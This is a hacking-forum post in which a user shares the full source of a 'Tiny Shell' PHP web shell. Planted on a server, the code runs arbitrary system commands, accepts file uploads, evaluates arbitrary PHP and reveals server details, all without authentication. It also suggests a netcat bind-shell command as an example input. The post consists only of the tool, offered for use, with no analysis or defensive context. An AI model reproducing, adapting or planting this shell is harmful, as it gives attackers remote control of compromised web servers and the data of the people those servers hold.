Jump to content
escalation666

tiny shell

By escalation666, in Programe hacking

Recommended Posts

escalation666 Newbie

escalation666

Posted
Posted 

<?php if (@$_GET['mode'] == 'phpinfo') { phpinfo(); exit; } echo '<html> <head><title>Tiny Shell</title> <style> div.display { border: 2px solid #003B62; font-family: verdana; font-size: 80%; background-color: #B5CFE0; padding: 7px; margin: 5px; } h2.info{ font-size: 150%; margin: 2 0 15 20 color: black; font-family: Arial; } </style> </head> <body> <center>[b]<h1><font face="arial">? Tiny Shell ?</font></h1>[/b]</center> 
'; $fullpath = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']; $maxsize = ini_get('upload_max_filesize'); $win = strtolower(substr(PHP_OS,0,3)) == "win"; $safemode = (@ini_get("safe_mode") || strtolower(@ini_get("safe_mode"))) == "on" ? "<font color=red>ON (secure)</font>" : "<font color=red>OFF (unsecure)</font>"; $disablefunc = @ini_get("disable_functions"); switch (@$_GET['mode']) { case 'command': if (!empty($_POST['tcommand'])) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> <pre>'.shell_exec($_POST['tcommand']).'</pre></div>'; } unset($_POST); break; case 'upload': $target_path = './' . basename($_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> The file [b]'.basename($_FILES['uploadedfile']['name']).'[/b] has been uploaded.</div>'; } else{ echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> An error occurred while uploading the file, please try again.</div>'; } break; case 'eval': if (isset($_POST['code'])) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2>'; eval(stripslashes($_POST['code'])); echo '</div>'; } break; } echo '<div class=\'display\'> <h2 class=\'info\'>? General Info</h2> [b]'.wordwrap(php_uname(),90,"
",1).'[/b]
 Full Script Path: [b]'.$fullpath.'[/b]
 Server Software: [b][url='.$fullpath.']'.$_SERVER['SERVER_SOFTWARE'].'[/url][/b]
 Safe Mode: [b]'.$safemode.'[/b]
 </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? File Uploads</h2> WARNING MAX FILESIZE: '.$maxsize.'
 <form enctype="multipart/form-data" action="?mode=upload" method="POST"> File to upload: <input type="file" name="uploadedfile" size=50 />
 <input type="submit" value="Upload File" /> </form> </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? Run a Command</h2> <form action="?mode=command" method="POST"> Command: <input type="text" name="tcommand" size=50 /> <input type="submit" value="Send Command" />
 [i]Example: nc -L -p 1337 -d -e cmd.exe[/i] </form> </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? Evaluate PHP</h2> <form action="?mode=eval" method="POST"> PHP code: 
<textarea name="code" rows="10" cols="90"></textarea>
 <input type="submit" value="Run Code" /> </form> </div> </body> </html>'; ?>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...